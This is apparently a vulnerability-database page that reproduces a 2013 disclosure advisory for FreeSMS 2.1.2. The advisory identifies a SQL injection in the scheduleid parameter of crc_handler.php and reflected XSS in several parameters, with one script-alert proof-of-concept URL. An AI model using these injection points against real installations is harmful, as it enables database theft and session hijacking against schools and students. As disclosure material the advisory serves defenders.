FreeSMS (Free Student Management System) 2.1.2 Multiple Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044355 漏洞类型
发布时间 2013-10-01 更新时间 2013-10-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013100004
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#####################

  ______                                __                                       ______                     
 /      \                              /  |                                     /      \                    
/000000  |  ______    ______   ______  00 |____   _____  ____    ______        /000000  |  ______    _______
00 \__00/  /      \  /      \ /      \ 00      \ /     \/    \  /      \       00 \__00/  /      \  /       |
00      \  000000  |/000000  |000000  |0000000  |000000 0000  | 000000  |      00      \ /000000  |/0000000/
 000000  | /    00 |00 |  00/ /    00 |00 |  00 |00 | 00 | 00 | /    00 |       000000  |00    00 |00 |     
/  \__00 |/0000000 |00 |     /0000000 |00 |  00 |00 | 00 | 00 |/0000000 |      /  \__00 |00000000/ 00 \_____
00    00/ 00    00 |00 |     00    00 |00 |  00 |00 | 00 | 00 |00    00 |      00    00/ 00       |00       |
 000000/   0000000/ 00/       0000000/ 00/   00/ 00/  00/  00/  0000000/        000000/   0000000/  0000000/
                                                                                                              
                                                                                                                                                                                                                           #####################
 
# Exploit Title: FreeSMS (Free Student Management System) 2.1.2 Multiple Vulnerability
# Date: 1 Oct 2013
# Vendor Homepage: http://freesms.sourceforge.net/
# Software Link: http://sourceforge.net/projects/freesms/
# Version: 2.1.2
# Tested on: Win 7/Backtrack
# CVE :
# Exploit Author: Sarahma Security
# Author Homepage: http://sarahma.co.id
# Author Email: research@sarahma.co.id
 
========================
SQL Injection
========================
Found on
http://localhost/freesms/pages/crc_handler.php
parameter : scheduleid
http://localhost/freesms/pages/crc_handler.php?method=evaluation&func=getanswers&scheduleid=15{SQL_HERE}
 
 
========================
XSS Vulnerability
========================
Found On
http://localhost/freesms/pages/crc_login.php
parameter : uid
 
Found On
http://localhost/freesms/pages/crc_handler.php
parameter : func and method
 
Example:
http://localhost/freesms/pages/crc_handler.php?method=profile&func=%3Cscript%3Ealert%28123%29%3C/script%3E
 
 
========================
Solution :
========================
No Update Until This Advisory published
  
========================
Timeline:
========================
2013-09-26 Provided details vulnerability to vendor
2013-09-29 No Response From Vendor
2013-10-01 Advisory published